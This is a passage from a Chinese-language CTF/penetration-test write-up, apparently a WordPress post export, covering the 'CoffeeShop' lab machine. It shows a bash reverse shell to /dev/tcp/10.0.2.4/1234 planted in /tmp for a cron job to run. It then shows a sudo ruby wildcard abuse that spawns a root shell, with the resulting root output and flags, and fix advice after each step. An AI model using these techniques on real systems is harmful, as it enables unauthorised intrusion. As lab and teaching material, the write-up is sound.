\/tmp\/*.sh<\/code><\/pre>\n<p>问题出在 <code>\/tmp\/*.sh<\/code> 这个通配符：脚本由 cron 每分钟执行一次，bash 在运行时才展开 <code>\/tmp\/*.sh<\/code>，而 <code>\/tmp<\/code> 是任何本地用户都可写的目录，所以往里放一个 <code>.sh<\/code> 文件就能让 cron 的执行用户替我们运行它。两点注意：一是展开后如果有多个 <code>.sh<\/code>，只有排序在最前面的那个会被当作脚本执行，其余的只是位置参数，动手前先 <code>ls \/tmp\/*.sh<\/code> 确认一下；二是前面 <code>\/etc\/crontab<\/code> 里那一行并没有写执行用户字段，实际以哪个用户运行要以回连后的 <code>id<\/code> 为准（下文 <code>sudo -l<\/code> 显示是 shopadmin），而且要等到下一分钟才会触发。修复方式是不要从全局可写目录执行脚本，也不要在 cron 脚本里用通配符拼命令。<\/p>\n<p>\u554a\uff0c\u8fd9\uff0c\u5728<code>tmp<\/code>\u521b\u5efa\u4e00\u4e2a<code>.sh<\/code>\u811a\u672c\uff0c\u811a\u672c\u5185\u5bb9\u662f\u5c1d\u8bd5\u53cd\u5f39\u4e00\u4e2ashell\uff1a<\/p>\n<pre><code class=\"language-bash\"># tuna\ncd \/tmp;\necho &quot;bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/10.0.2.4\/1234 &lt;&amp;1&#039;&quot; &gt; exp.sh\n\n# kali\npwncat-cs -lp 1234<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325647.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404011325647.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240401131521143\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">sudo -l\nMatching Defaults entries for shopadmin on coffee-shop:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin,\n    use_pty\n\nUser shopadmin may run the following commands on coffee-shop:\n    (root) NOPASSWD: \/usr\/bin\/ruby * \/opt\/shop.rb<\/code><\/pre>\n<p>牛蛙，shopadmin 可以 NOPASSWD 以 root 身份运行 ruby，而且 sudoers 规则的参数位置还有一个通配符 <code>*<\/code>！<\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">cat \/opt\/shop.rb\nputs &quot;C0FF33 SHOPS R 
L33T&quot;<\/code><\/pre>\n<p>看到那个 <code>*<\/code> 了吗：sudoers 里的 <code>*<\/code> 匹配任意参数串（可以含空格，也就是多个参数），只要命令以 <code>\/usr\/bin\/ruby<\/code> 开头、以 <code>\/opt\/shop.rb<\/code> 结尾就能通过校验。而 ruby 只把命令行上第一个非选项参数当作要执行的脚本，排在后面的 <code>\/opt\/shop.rb<\/code> 只会作为 <code>ARGV<\/code> 传进去，所以把自己的脚本放在前面，就能以 root 身份执行任意 Ruby 代码：<\/p>\n<pre><code class=\"language-bash\">echo &quot;system &#039;\/bin\/bash&#039;&quot; &gt; \/tmp\/fuck.rb\nsudo \/usr\/bin\/ruby \/tmp\/fuck.rb \/opt\/shop.rb<\/code><\/pre>\n<p>\u7136\u540e\u5c31\u83b7\u5f97\u4e86root\uff01<\/p>\n<pre><code class=\"language-css\">sudo \/usr\/bin\/ruby \/tmp\/fuck.rb \/opt\/shop.rb\nroot@coffee-shop:\/home\/shopadmin# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@coffee-shop:\/home\/shopadmin# cd \/root;ls -la\ntotal 64\ndrwx------  6 root root 4096 Feb  3 10:31 .\ndrwxr-xr-x 19 root root 4096 Jan  3 13:36 ..\n-rw-------  1 root root 4345 Feb  3 10:32 .bash_history\n-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc\ndrwx------  2 root root 4096 Jan  3 18:40 .cache\n-rw-------  1 root root   20 Jan  3 18:20 .lesshst\ndrwxr-xr-x  3 root root 4096 Jan  3 13:45 .local\n-rw-------  1 root root 1539 Jan  3 17:08 .mysql_history\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   25 Feb  3 10:31 root.txt\ndrwx------  3 root root 4096 Jan  3 13:37 snap\ndrwx------  2 root root 4096 Jan  3 13:37 .ssh\n-rw-r--r--  1 root root    0 Jan  3 14:12 .sudo_as_admin_successful\n-rw-------  1 root root 9874 Feb  3 10:31 .viminfo\nroot@coffee-shop:~# cat root.txt\nC4FF3331N-ADD1CCCTIONNNN\nroot@coffee-shop:~# cd \/home;ls\nmrmidnight  shopadmin  tuna\nroot@coffee-shop:\/home# cd tuna;ls\nroot@coffee-shop:\/home\/tuna# cd ..\nroot@coffee-shop:\/home# cd shopadmin\/;ls\nexecute.sh  user.txt\nroot@coffee-shop:\/home\/shopadmin# cat user.txt\nDR1NK1NG-C0FF33-4T-N1GHT<\/code><\/pre>\n<p>修复建议：sudoers 规则不要在解释器的参数位置使用通配符，应写成精确命令 <code>\/usr\/bin\/ruby \/opt\/shop.rb<\/code>，并保证 <code>\/opt\/shop.rb<\/code> 只有 root 可写；否则任何能以该规则运行 ruby 的用户都等于拥有 root。<\/p>\n","protected":false},"excerpt":{"rendered":"<p>CoffeeShop \u626b\u63cf\u4e00\u4e0b\uff1a \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf sudo nmap -sS -p 1-65535 10. 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-481","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/481","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=481"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/481\/revisions"}],"predecessor-version":[{"id":482,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/481\/revisions\/482"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=481"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=481"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=481"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}